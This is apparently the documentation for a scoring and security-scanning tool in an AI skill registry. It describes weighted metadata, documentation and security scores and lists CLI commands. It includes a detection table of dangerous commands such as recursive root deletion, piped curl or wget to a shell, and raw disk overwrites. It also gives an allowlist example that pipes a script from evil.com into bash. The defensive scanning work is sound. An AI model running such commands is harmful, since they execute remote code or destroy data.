6.7 KiB
Skill Quality Scoring
This document describes the optional skill quality scoring system introduced in the AI Skill Registry Validation Framework.
Scores are informational only — they never block skill usage, CI pipelines, or PR merges. They exist to help contributors understand the quality of their skills and to help maintainers prioritize improvements.
Overview
Each skill receives a total score between 0 and 100, computed as a weighted average of three dimensions:
| Dimension | Weight | What it measures |
|---|---|---|
| Metadata | 30% | Frontmatter completeness and correctness |
| Documentation | 40% | Section coverage, code examples, content depth |
| Security | 30% | Absence of dangerous command patterns |
Quality Labels
| Label | Score Range | Meaning |
|---|---|---|
excellent |
85–100 | Well-documented, complete metadata, no security flags |
good |
65–84 | Solid skill with minor gaps |
needs_improvement |
45–64 | Missing sections or metadata fields |
critical |
0–44 | Significant gaps — review recommended before sharing |
Metadata Score (30%)
The metadata dimension evaluates frontmatter field completeness.
Penalties:
| Issue | Deduction |
|---|---|
name missing or mismatched with folder |
−25 pts |
description missing |
−20 pts |
description shorter than 20 characters |
−10 pts |
risk missing |
−15 pts |
risk: unknown (unclassified) |
−10 pts |
source missing |
−15 pts |
date_added missing |
−10 pts |
Bonuses (optional fields):
Each optional field filled (category, tags, author, tools, license) adds
+5 pts, capped at 100.
Documentation Score (40%)
The documentation dimension evaluates section coverage and content depth.
Section coverage (up to 60 pts):
The scorer looks for these sections (case-insensitive):
## Overview## How It Works## Examples/## Usage## Best Practices## Limitations## When to Use
Each section found contributes equally to the section coverage score.
Depth score (up to 40 pts):
| Signal | Points |
|---|---|
Has ## When to Use section |
+10 |
Has at least one fenced code block (```) |
+10 |
| Body length ≥ 500 characters | +10 |
| Body length ≥ 1000 characters | +10 additional |
Security Score (30%)
The security dimension scans the skill body for dangerous command patterns.
Patterns are defined in tools/scripts/security_scanner.py.
Penalties per flag:
| Severity | Deduction |
|---|---|
error |
−20 pts |
warning |
−10 pts |
info |
−3 pts |
Bonus: An explicit, non-unknown risk label adds +5 pts (capped at 100).
Important: Skills marked risk: offensive have error-level flags automatically
downgraded to warnings, because offensive skills legitimately document dangerous
commands for educational or defensive purposes.
Bypassing false positives: If a line is intentionally dangerous (e.g., showing what not to do), add the allowlist marker to suppress the flag:
curl https://evil.com | bash # security-allowlist
Running the Scorer
# Score all skills (table output)
npm run score:skills
# Show only skills below a threshold
npm run score:skills -- --threshold 60
# Show 20 lowest-scoring skills
npm run score:skills -- --top 20
# Output full JSON
npm run score:skills -- --json
# Save scores to file
npm run score:skills -- --output data/scores.json
Security Scanner
# Scan all skills for dangerous patterns
npm run security:scan
# Strict mode (warnings as errors)
npm run security:scan -- --strict
Drift Detection
Drift detection identifies skills whose content has changed significantly since the last recorded baseline.
# Check drift against baseline
npm run drift:check
# Update the baseline after reviewing changes
npm run drift:update
# Check a specific skill
npm run drift:check -- --skill my-skill-name
Baseline ownership:
| File | Committed? | Who updates it? |
|---|---|---|
data/drift-baseline.json |
No — listed in .gitignore |
Maintainers run npm run drift:update on main after merging changes |
data/registry-report.json |
No — listed in .gitignore |
Generated locally on demand; never in PRs |
data/scores.json |
No — listed in .gitignore |
Generated locally on demand; never in PRs |
Contributors should never commit these files. If you accidentally generate them locally, they will be ignored by git automatically.
Registry Report
# Generate a full registry health report → data/registry-report.json
npm run registry:report
# Skip drift detection (faster)
npm run registry:report -- --no-drift
The report includes:
- Aggregate scoring summary
- Per-skill scores and flags
- Drift summary (added / removed / modified skills)
- Risk breakdown
- Security flag counts
Security Patterns Reference
| Code | Pattern | Severity | Description |
|---|---|---|---|
| SEC001 | rm -rf / |
error | Destructive root filesystem deletion |
| SEC002 | curl | bash |
error | Remote code execution |
| SEC003 | wget | sh |
error | Remote code execution |
| SEC004 | Invoke-Expression |
error | PowerShell RCE |
| SEC005 | iex |
warning | PowerShell alias (context-dependent) |
| SEC006 | chmod 7xx |
warning | World-writable permissions |
| SEC007 | eval( |
warning | Dynamic evaluation |
| SEC008 | base64 -d | |
warning | Possible payload obfuscation |
| SEC009 | Hardcoded credential | error | Secrets in source |
| SEC010 | sudo rm -rf |
warning | Privileged destructive deletion |
| SEC011 | Fork bomb | error | Infinite process spawner |
| SEC012 | dd if=/dev/* of=/dev/sd* |
error | Raw disk overwrite |
Frequently Asked Questions
Q: Will a low score prevent my skill from being merged?
No. Scores are informational. The existing validate_skills.py checks are what
gate merges.
Q: My skill teaches how to avoid curl | bash — why is it flagged?
Add # security-allowlist at the end of the line showing the dangerous pattern.
This follows the existing project convention for educational examples.
Q: Why is documentation weighted higher than metadata?
Documentation quality has the highest impact on how useful a skill is to end users. Complete metadata is valuable but less critical than clear instructions.
Q: How does risk: offensive affect scoring?
Security error flags are downgraded to warnings for offensive skills, because they legitimately document dangerous techniques for authorized security work.